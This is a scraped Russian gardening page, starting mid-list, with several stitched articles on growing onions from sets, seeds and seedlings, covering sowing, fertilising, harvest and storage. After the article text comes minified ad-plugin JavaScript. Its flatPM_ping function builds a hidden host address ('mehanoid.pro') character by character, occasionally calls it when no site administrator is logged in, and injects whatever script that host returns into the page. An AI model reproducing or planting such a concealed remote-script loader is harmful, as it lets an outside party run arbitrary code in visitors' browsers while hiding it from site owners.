  2. Еще через месяц можно подкормить культуру аммиачной селитрой (40 г на 1 растение). В качестве ее замены используют нитрат калия. Его можно насыпать как в сухом виде (1 ч. л. на 1 растение), так и в разведенном (30 г на 3 л воды). Если будете использовать разведенный нитрат калия, то на 1 куст вливают не менее 200 мл жидкости.

За месяц до уборки урожая нужно повысить количество влаги в почве. Для этого полив осуществляют не 1 раз в неделю, а 2 раза. Это позволит ускорить рост куста, созревание и наливание головок.

За неделю до уборки прекращают полив и стараются убрать луковицы через одну. Это позволит вам собрать продукцию разного размера. Те плоды, которые вынуты из почвы первыми, будут более сладкими и среднего размера. Те же, что будут убраны в конце, станут более острыми и крупными.

Если не сделать заранее выборочную уборку продукции, то все плоды будут среднего размера. Это связано с тем, что им не достаточно места для набора веса и габаритов.

Сбор урожая

Определить то, что репчатый лук созрел, несложно. На это сразу указывает пожелтение и полегание листвы.

Уборку урожая нужно проводить в солнечную погоду. Это обеспечит сухость почвы, и головки вырваться из земли получится быстрее. При солнечной погоде луковицы быстрее просохнут.

После уборки урожая, необходимо перенести его в другое место на неделю. Это позволит ей полностью просохнуть, что снизит риск гниения при хранении. После этого продукцию необходимо перебрать и обрезать верхушки, оставляя только 5-сантиметровый пенек. Хранить луковицы нужно в сухом и прохладном месте.

Длительность хранения лука зависит от сорта. Но большинство видов может храниться в надлежащих условиях около 6 месяцев.

Если во время уборки урожая вы обнаружили, что на некоторых плодах плотная и толстая кожица, то их нужно употреблять в первую очередь. Объяснить это можно тем, что плотная кожура не позволит луку хорошо просохнуть.

В результате он будет быстрее гнить. Процесс гниения распространится по всему хранилищу, что приведет к полной потере продукции.

Правила хранения севка

Хранение севка должно осуществляться в вертикальном положении, поэтому его связывают в косы или же складывают в корзину. Если он мелкий, то нужна температура в 2 °С. Если она будет повышаться до 5 °С, но это будет кратковременно, ничего плохого не случится.

Если севок будет крупным, то содержать его нужно при температуре 10-12 °С. Старайтесь сделать так, чтобы температура не понижалась, т. к. показатели всхожести и урожайности будут снижаться. Если вашему луку будет обеспечен надлежащий уход, вы сможете добиться хороших урожаев.

Запись Как вырастить репчатый лук из севка, семян или рассады впервые появилась SeloMoe.

Выращивание репчатого лука из семян

Добавление статьи в новую подборку

Посадку лука семенами практикуют не все дачники, а зря. Этот нехитрый способ позволяет наладить непрерывное луковое «производство» и быть уверенным в здоровье посадочного материала и его сортовых качествах.

Главный плюс такого метода в том, что вы можете сэкономить немало средств, хоть купив семена вместо севка, хоть собрав их на собственном участке или у соседей.

Как вырастить лук-севок из семян

Хорошие семена лука – залог качественного результата, поэтому выбирать их нужно очень внимательно. Подойдут семена любого понравившегося вам сорта, при условии, что они вызрели, были правильно собраны и хранились в сухом месте. Если семечки одного размера, сухие, черные, блестящие, без примесей и плесени – смело используйте их для посева.

Подготовка почвы для посева лука

Прежде чем посеять семена лука в грунт, нужно выбрать оптимальное для этого место. Лучше всего всходы удаются там, где в прошлом году росли кабачки, огурцы, помидоры или капуста. А вот на луковой грядке и рядом с ней могли остаться болезнетворные бактерии и луковая муха.

Выберите освещенное, хорошо проветриваемое место, перекопайте землю и начинайте вносить удобрения примерно за неделю до посева. В рыхлую дышащую почву добавьте полведра перепревшего навоза или компоста и 1 ст.л. нитрофоски, Кемиры Универсал, Растворина или другого комплексного минерального удобрения на 1 кв.м.

На тяжелых глинистых почвах к этому комплексу добавьте по 1 ведру песка и перепревших опилок, а кислые загодя смешайте с половиной стакана золы или доломитовой муки на 1 кв.м.

Подготовка семян лука к посеву

Семена лука-чернушки покрыты твердой оболочкой, поэтому их нужно заранее замачивать. Поместите весь объем во влажную ткань и регулярно опрыскивайте теплой водой, не давая пересыхать. Когда первые семена проклюнутся (через 1-3 суток), можно приступать к севу.

Если вы сомневаетесь в качестве семян, например, они хранятся не первый год, заранее проверьте их на всхожесть. Замочите чернушку водой и поставьте в теплое место – через несколько дней должно проклюнуться больше половины. Если этого не произошло, семена стоит заменить или просто сеять гуще.

Посев лука семенами

Сам посев прост и не отнимет у вас много времени. Приступать к нему в средней полосе можно в предпоследнюю или последнюю неделю апреля. А вот жителям других регионов придется решать, когда сажать лук семенами, в зависимости от погоды. В любом случае, ориентироваться нужно не на возвратные заморозки (с ними лук справится), а на среднесуточную температуру – она должна быть выше 15-18°С.

Многие дачники задаются вопросом, можно ли сажать семена лука под зиму. Можно, но у этого способа есть свои нюансы. Во-первых, готовить гряды нужно так же, как и весной, но не раньше октября. А во-вторых, саму посадку семян лука под зиму начинают только по мерзлой земле или даже по первому снегу, когда оттепелей уже не предвидится. Семена сеют чуть гуще, чем весной, обязательно сухими, сразу прикрывают заранее заготовленной землей или торфом, а саму гряду укрывают толстым слоем лапника.

В выбранный день подготовленные гряды проливают теплой водой, а затем прокладывают на них бороздки. Глубина их должна быть не более 3 см, расстояние друг от друга – около 15 см. Дно бороздок припудривают золой и приступают к раскладке семян. Да, их именно раскладывают на расстоянии 1,5-2 см друг от друга, а не сеют общепринятым способом. Хотя норма высева лука 4 г на 1 пог.м, сеять его, как укроп, не стоит – всходы получатся неравномерными, и луковички станут мешать друг другу.

Посеянные семена присыпают тонким слоем земли, торфа или песка, гряду мульчируют. Если семена были пророщенными, дополнительного полива не нужно – они и так появятся на поверхности через неделю. А вот сухие семена нужно аккуратно полить, и взойдут они не раньше, чем через 10 дней.

Хотя лук не слишком теплолюбив, сильный заморозок может побить нежные всходы, поэтому на ночь прикрывайте гряду спанбондом или пленкой.

Уход за рассадой лука из семян

Семена лука всходят медленно, а молодые листочки растут очень и очень долго. Если всходы вы увидите через пару недель после сева, то пару настоящих листьев – только через месяц. Несмотря на бледный внешний вид, забывать о луке нельзя, иначе его поглотят куда более активные сорняки, и найти его в дебрях одуванчиков и мокрицы будет нереально.

По мере подсыхания почвы (раз в 3-4 дня) поливайте луковые всходы теплой водой, регулярно неглубоко рыхлите междурядья, разбивая корку. Когда на каждом растении будет 3-4 настоящих листочка, проредите посевы, оставив между ними 3-4 см. Затем осуществите две подкормки с интервалом 10 дней. Для первой вам понадобится 1 ст.л. мочевины на ведро воды, для второй – она же и по половине ч.л. суперфосфата и сульфата калия.

Проводя подкормку, лейте удобрение в борозды, а не на листья, чтобы не допустить ожога.

Уборка и хранение лука-севка

Во второй половине июля листья севка начинают желтеть и полегать. Не стоит пугаться и стремиться «напоить» увядающие растения. На самом деле эти признаки говорят о том, что севок созрел и готов к уборке.

Выдерните луковицы, разложите их прямо на земле (если погода сухая) и оставьте на 3 дня. Затем отнесите в максимально жаркое место (на чердак или веранду) и посушите еще 5-7 дней. Прежде чем убирать лук-севок на хранение, отсортируйте его. Лучшие луковицы получаются из севка диаметром 1,5-2 см, более крупный стрелкуется, а мелкий засыхает.

Отбраковку необязательно выбрасывать – вы вполне можете посадить ее под зиму, чтобы весной получить ранний урожай.

Хранят севок в тканевых или сетчатых мешках, в прохладном и сухом месте. Сгодится сарай, застекленный балкон или кладовая в квартире.

Выращивание лука из севка

Лук, пожалуй, самая распространенная культура в наших приусадебных хозяйствах, поэтому подробно останавливаться на выращивании лука-репки из севка не станем, повторим лишь основные моменты.

Итак, если вы решили поэкспериментировать с подзимней посадкой лука на перо или на головку, готовьте гряду в начале сентября, внося в землю те же удобрения, что и при посеве семян. В конце первого месяца осени или начале второго можете приступать к посадке.

Обеззаразьте отбракованные (слишком мелкие) луковички в розовом растворе марганцовки 30 минут, просушите и раскладывайте по бороздкам глубиной 4 см на расстоянии 10-12 см друг от друга. Необрезанная шейка у луковки должна скрыться под слоем земли на глубине 3-5 см, присыпанная слоем почвы или торфа. Гряды не поливают, мульчируют, укрывают лапником, а при появлении снега активно набрасывают его сверху.

Весной укрытие убирают, а при появлении 2 настоящих листочков лук подкармливают мочевиной (2 ч.л. на 10 л воды). Затем уход осуществляют так же, как и за луком весенней посадки.

Если вы покупаете лук-севок, выбирайте для этого питомники, садовые центры, специализированные магазины, поскольку на рынке высока вероятность купить зараженный посевной материал.

Перед посадкой севок сортируют, отбраковывая загнивший или проросший, просушивают на окне 3-4 дня, дезинфицируют в розовом растворе марганцовки 30 минут и лишь затем сажают. Почву для посадки лука готовят так же, как и для посева семян. А вот раскладывают севок на расстоянии 15 см друг от друга и на глубину 4 см. Затем их присыпают слоем почвы толщиной 2 см, слегка вдавливают и обильно поливают.

Полив сперва осуществляют каждую неделю, затем чуть реже, ориентируясь на погоду, а за 2 недели до уборки поливы и вовсе прекращают. Через месяц после появления листьев лук подкармливают мочевиной (1,5 ст.л. на 10 л воды) – такого раствора хватает на 2 кв.м, через 2 недели подкормку повторяют, а еще через две удобряют лук раствором сернокислого калия (1,5 ст.л.) и суперфосфата (1 ст.л.) на ведро воды.

Важно не забывать и о рыхлении, которое часто называют сухим поливом. Почвенной корки на луковой гряде быть не должно. И не забывайте выламывать появляющиеся стрелки, иначе луковицы остановятся в развитии и не будут храниться.

Как получить семена репчатого лука

Хотите полностью перейти на собственное производство семян, но не знаете, как собрать семена лука? Все довольно просто, хотя некоторые навыки все же понадобятся.

  1. Выберите 5-7 крупных и здоровых луковиц одного сорта.
  2. В мае посадите их в грунт, положив под каждую по 150 г компоста и разместив на расстоянии 50 см друг от друга.
  3. Регулярно рыхлите и окучивайте посадки, дважды внесите в почву азотное удобрение.
  4. Подвяжите луковую стрелу к колышку и защитите от птиц.
  5. После начала пожелтения цветоносов лука срежьте их и подвесьте в сухом теплом месте дозревать.
  6. Вытряхните зрелые семена из цветочной шапки, сложите в бумажный пакет и подпишите.
  • Выращивание лука-репки из семян за один сезон

    Для тех, кто не хочет долго возиться и мечтает вырастить полноценный лук из семян за один сезон, существует вполне реальная, хотя и довольно хлопотная технология. Подходят для реализации подобного плана не все сорта, а лишь ранние, такие, как Бородковский, Золотничок, Кармен, Одинцовец, Ранний розовый, Ред Барон, Сибирский и т.д.

    Выращивание рассады лука из семян на подоконнике

    Семена лука на рассаду высевают в ящики глубиной 10 см до 5-12 марта. Для проращивания используют торфогрунт с микроэлементами или самостоятельно обогащают его древесной золой из расчета 0,5 стакана на 5 кг. Пророщенные семена сеют на глубину 1 см и оставляют емкости при комнатной температуре, слегка увлажняя. После появления всходов температуру снижают до 14-16°С, а всходы прореживают, чтобы между ними осталось 2-3 см.

    Поливают рассаду через день теплой водой, дважды подкармливают комплексным минеральным удобрением по инструкции. К моменту высадки на каждом растении должно быть 3-4 настоящих листика.

    Высадка лука в грунт

    В середине мая рассада, как правило, уже готова к переезду на постоянное место. К пересадке лук готовят следующим образом:

    • обильно поливают;
    • вынимают из ящика;
    • на треть обрезают листья и корни;
    • обмакивают корни в глиняную болтушку.

    Высаживают луковички, не сильно заглубляя, на расстоянии 8 см в ряду и 20 см – между рядами. Дальнейший уход осуществляют, как и за обычным луком, но убирают не раньше середины августа и стараются долго не хранить.

    Как видите, посадка лука семенами в грунт и выращивание его через рассаду – занятие совсем простое. Попробуйте освоить эту «бабушкину» методику, и лук будет ежегодно радовать вас обильными урожаями и высоким качеством.

    Выращивание лука из семян за один сезон через рассаду: пошаговая инструкция, когда сажать и как вырастить в домашних условиях

    Выращивание лука из семян за один сезон через рассаду в домашних условиях, по словам опытных огородников, позволяет получить хороший урожай. Для этого выбирают подходящие сорта и следуют пошаговой инструкции, представленной в нашей статье.

    Современные гибриды позволяют вырастить лук за один сезон без севка и даже рассады — посевом семян сразу в грунт. Главное сделать грядки на возвышенности, тогда они быстро прогреются. Лучше выбирать скороспелые высокоурожайные сорта. Это простой метод, так как не надо выращивать рассаду. Но он более рискованный, особенно для регионов с прохладным климатом. Поэтому стоит отдать предпочтение выращиванию лука за один сезон через рассаду.

    Плюсы выращивания через рассаду

    Выращивание лука через рассаду имеет множество преимуществ:

    • Подходит для культивирования в северных регионах и получения хороших головок с однолетнего растения.
    • Экономия места. Даже на небольшом участке при рассадном методе можно собрать богатый урожай.
    • Экономия семян. Посадочного материала тратят в 3-4 раза меньше, чем при посадке севка, получая при этом хороший урожай.
    • Не требует много затрат физических сил, а результат выше, чем при культивировании лука из севка.

    Выбор сорта для посадки

    Выбирать сорт надо по следующим критериям:

    • Срок созревания. Ранний лук созревает за 90 дней, среднеспелый – за 110 дней, поздний – за 120-130 дней. Поэтому одни сорта высаживают на зелень, другие — на репку.
    • Количество зачатков. Малогнездные сорта формируют 1-2 головки и выращиваются на репку. Многозачатковые образуют в гнезде не менее 5 штук и дают много зелени.
    • Размер луковиц. Мелкие весят до 50 г, средние – до 120 г, крупные — до 400 г и больше.
    • Вкус. Лук может быть острым, полуострым и сладким.

    Производители семян указывают характеристики сорта на упаковке.

    Для однолетнего выращивания лука подходят такие сорта:

    На нашем сайте есть статья о выращивании лука сорта Эксибишн через рассаду: Посадка лука Эксибишн на рассаду.

    Также подойдут скороспелые высокоурожайные сорта:

    Опытные огородники рекомендуют выращивать таким способом малозачатковые полуострые сорта:

    • Краснодарский 35;
    • Каба;
    • Каратальский и другие

    Из этих сортов можно получить большие луковицы в первый год.

    Также хорошо растут через рассаду такие сорта:

    • Любчик;
    • Веселка;
    • Глобус;
    • Мавка;
    • Амфора;
    • Кэнди F1;
    • Стерлинг F1;
    • Дайтона F1;
    • Копра F1;
    • Ред Барон;
    • Шаман ;
    • Кентавр;
    • Восторг;
    • Фермер.

    Когда сажать семена на рассаду

    Рассады лука развивается 60-75 дней. В этом возрасте ее высаживают в открытый грунт. В виду этого, посев следует осуществлять примерно в марте, все зависит от региона выращивания.

    • В средней полосе и Подмосковье – в конце марта.
    • В Ленинградской области — в начале апреля.
    • В Сибири – в середине апреля.
    • На Урале — с 20 марта до 10 апреля.

    Благоприятные дни для посадки лука можно выбрать по Лунному посевному календарю

    Выращивание через рассаду за один сезон

    Грунт для рассады

    Почва должна быть с нейтральной кислотности (pH6). Поэтому лучше купить готовый грунт для овощной рассады в садовом магазине. Также можно использовать дерновый грунт, соединив его в равных количествах с перегноем или сфагновый торф с добавлением органики и минеральных удобрений.

    В ящиках

    Рассаду можно выращивать в ящиках, горшках, кассетах. При посеве семян в ящики надо учитывать следующие нюансы:

    • Сначала семена замачивают в воде 35 градусов на 8 часов, можно бросить в воду несколько кристалликов марганцовки, чтобы раствор получился слабый.
    • Затем 1-2 часа подержать в растворе с стимулятором роста (соке алоэ, Эпин, Циркон, 1-2 капли на 100 мл воды).
    • Далее семена промывают водой и просушивают.
    • В общую емкость сеют семена с интервалом 1 см друг от друга, в междурядье оставляют 4-6 см. Далее их присыпают грунтом 1-2 см. В кассеты выкладывают по 2-3 семени. Высаживают на 1 кв. метр 20 г семян.

    • Посадки накрывают пленкой и оставляют в помещении с температурой 24 – 25 градусов до появления всходов.

    • После этого температуру понижают до +14-16 градусов, чтобы избежать вытягивания всходов.

    • Рассаду регулярно нужно подкармливать. Например, настоем куриного помета в пропорции 1:10.

    Обычно от прорастания семян до пересадки на постоянное место рассада развивается 50-60 дней. Этих сроков достаточно, чтобы у растений сформировались 3-4 настоящих листочка.

    Посмотрите видео! Правильный посев лука на рассаду!

    В улитке

    Семена лука также можно высаживать в улитки (на туалетной бумаге или на почве).

    • Для выращивания в улитке или пеленке применяют одноразовые пелёнки. Их режут полосками по 10 см шириной и любой длины.

    • На пленку выкладывают туалетную бумагу и увлажняют ее стимулятора роста или раствором сока алоэ.

    • Семена выкладывают ближе к верху с интервалом 1-2 см.

    • Далее выкладывают второй слоем бумаги, опрыскивают и накрывают пеленкой.

    Совет! Вместо туалетной бумаги можно насыпать слой грунта.

    • Посадки сворачивают в рулон.

    • Ставят в пластиковый стаканчик (в 1 стаканчик может поместиться несколько свертков).
    • В стакан наливают 1-1,5 см воды, для увлажнения семян.
    • Сверху накрывают пленкой с дырочками для вентиляции.
    • Оставляют в теплом месте.

    Посмотрите видео! Выращивание рассады лука в улитке

    Такие всходы удобно высаживать или пикировать.

    Сверток просто раскручивают, у рассады прищипывают на 1-2 см корешки и растения высаживают на новое место.

    Совет! Бумагу убирать от рассады не надо, она сама раствориться в грунте.

    В теплице

    Также сорта лука можно выращивать на рассаду в теплице. В этом случае нужно учитывать следующее.

    Сначала готовят паровую грядку:

    • Биотопливо укладывают на грядку и засыпать 10 см слоем земли. Этой толщины достаточно для образования тепла, которое не будет уходить из грядки.
    • Затем на землю выкладывают подготовленный парниковый грунт: по 1 части перепревших опилок и торфяной крошки и по 4 части парникового перегноя и дерновой земли.
    • Далее на ведро этой смеси вносят по 1 ч. ложке суперфосфата, аммиачной селитры и сульфата калия, а также 0,5 стакана древесной золы.

    Важно! Для создания грядки нельзя использовать землю, на которой рос лук.

    • Грядка должна хорошо освещаться. Лучше ее обустроить ближе к окнам.

    Семена сеют только после предпосевной подготовки:

    • Замачивание.
    • Просушка.
    • Калибровка.
    • Обработка микроэлементами.
    • Обеззараживание.

    При посеве придерживаются рекомендованной нормы:

    • семена располагают с интервалом 1 см друг от друга;
    • между рядами оставляют 5 см.
    • заглубляют на 1,5 см;

    • засыпают перегноем;
    • аккуратно поливают теплой водой из лейки с ситом;
    • грунт уплотняют и мульчируют слоем 1 см (торфяная крошка и т.д.).
    • Семена быстрее прорастут при температуре +18-20 градусов. Такую температуру надо держать 2-3 недели. Всходы могут появится через 14 дней.
    • После этого надо опустить температуру до + 10-11 градусов, а спустя 4-5 дней днем держат температуру + 15-16 градусов и ночью – в пределах + 10-12 градусов. При ожидании ночных заморозков посадки укрывают утепляющим материалом. Таким меры помогут избежать вытягивания рассады.

    В это время теплицу регулярно проветривают. Когда саженцы окрепнут их надо закаливать для пересадки в открытый грунт.

    При любом из перечисленных методов нужна пикировка. Если растения находятся ближе 1,5-2 см друг от друга также их надо прорядить.

    За 14 дней до высадки севка на постоянное место, росткам укорачивают световой день до 10-12 часов, чтобы луковицы быстрее созрели.

    Одновременно 1 раз в 2-3 дня проводят полив и подкормку:

    • Вариант 1 — нитрофоска – 1,5 ст. ложку разбавляют в ведре воды.
    • Вариант 2 — в ведре воды разводят 5 г сернокислого калия, 10 г мочевины и 20 г суперфосфата.

    Высадку проводят в вечернее время, перед пересадкой обязательно поливают грядки.

    Высадка рассады в открытый грунт

    Когда рассаде севка исполнится 55-60 дней, ее можно пересаживать на постоянное место. Если сделать это не вовремя, то растения будут дольше адаптироваться к новым условиям. Если выращивают парниковым методом, рассаду переносят с небольшим комом земли.

    • Сначала проводят сортировку. Саженцы с повреждениями и слабые удаляют.
    • Перед посадкой корни и зелень обрезают на 1/3.
    • Саженцы обмакивают в болтушке из коровяка и глины.

    Пересадку проводят в теплый и сухой день. Обычно в мае.

    • Грядку перекапывают и делают борозды. Далее землю обильно поливают и высаживают саженцы.

      • Ростки сажают на 2 см в глубину через 7-10 см друг от друга, оставляя в междурядье 30-55 см.
    • После этого посадки поливают — по 1 л воды под каждый саженец. Землю уплотняют и мульчируют.
    • Через 3 дня можно провести рыхление.

    Посмотрите видео! Лук за один сезон через рассаду

    При правильно агротехнике рассада быстро приживается и начинает расти. Уход сводится к регулярному поливу, внесению удобрений, удалению сорняков и рыхлению грунта.

    Подкормка

    • Первый раз удобрения вносят через 14 дней после высадки рассады. Применяют птичий помет или раствор коровяка (1:10). На ведро настоя добавляют 25 г мочевины. На каждый саженец идет 1л раствора.
    • Второй раз удобряют в середине июня фосфорно-калийными подкормками. Суперфосфат вместе с навозной жижей (на 10 л воды добавляют 2 ст. ложки суперфосфата) или «Гумисол» соединяют с также с суперфосфатом или другим фосфорным удобрением.
    • С июля прекращают вносить азотные удобрения.

    Полив

    Поддерживать высокую влажность грунта надо, пока рассада будет укореняться. Когда луковица сформировалась, полив сокращают. В регионах с засушливым климатом за сезон лук поливают 8-9 раз.

    Если идут дожди лук поливать не нужно. Если солнечная погода, то лук поливают один раз в неделю из расчета по 10 л на 1 кв. м.

    Более подробно о правильном поливе лука в статье : Особенности полива лука в открытом грунте

    За 3 недели до сбора урожая прекращают полив, иначе лук будет водянистым и быстро испортиться.

    Рыхление и удаление сорняков

    Каждый раз после полива удаляют сорняки и рыхлят грунт.

    Борьба с болезнями и вредителями

    Лук может подвергнуться бактериальным или грибковым инфекциям таким как: фузариозной гнилью донца, ржавчиной, луковой мозаикой, шейковой гнилью, пероноспорозом, черной плесенью и др.


    Универсальным средством опрыскивания является раствор:
      • 10 л воды;
      • 1 ч. ложка медного купороса;
      • 1 ст. ложка натертого на терке хозяйственного мыла.

    Данное средство применяется с того момента , как перья достигнут 15 см в длину.

    Наиболее распространенным вредителем для рассматриваемого овоща является луковая муха; капустная совка, луковая моль, нематода, вредная долгоножка.

    Посмотрите видео! Супер средство — нашатырный спирт- от луковой мухи

    Применяя рассадный метод выращивания лука можно вырастить хороший урожай за один сезон.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};